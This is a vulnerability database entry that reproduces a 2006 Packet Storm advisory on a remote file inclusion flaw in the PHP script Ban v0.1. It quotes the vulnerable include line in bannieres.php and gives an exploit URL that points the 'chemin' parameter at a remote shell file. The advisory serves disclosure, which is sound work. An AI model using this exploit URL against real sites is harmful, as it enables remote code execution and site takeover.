Lucene search

K

Banv0.1.txt

🗓️ 31 Oct 2006 00:00:00Reported by mahmood aliType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 17 Views

Vulnerable file inclusion in bannieres.php can be exploited via crafted URL leading to remote file access.

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`###################################################  
Ban v0.1 (bannieres.php) File Include  
###################################################  
Source Code:  
  
ftp://ftp1.comscripts.com/PHP/1959_ban01-01.zip  
  
###################################################  
Vulnerable Code:_  
  
modules/bannieres/bannieres.php  
  
###################################################  
In Line 13 :_  
  
include "$chemin/includes/connexion.php" ;  
  
###################################################  
Exploit :_  
  
http://www.VicTim.com/[Ban_Path]/modules/bannieres/bannieres.php?chemin=Sh3ll.txt?  
  
###################################################  
  
Discoverd By : Mahmood_ali  
  
###################################################  
  
Special Greetings :_ Tryag-Team & 4lKaSrGoLd3n-Team > WwW.DwRaT.CoM &   
WwW.Tryag.CoM  
  
###################################################  
  
_________________________________________________________________  
Be the first to hear what's new at MSN - sign up to our free newsletters!   
http://www.msn.co.uk/newsletters  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
31 Oct 2006 00:00Current
7.4High risk
Vulners AI Score7.4
17
.json
Report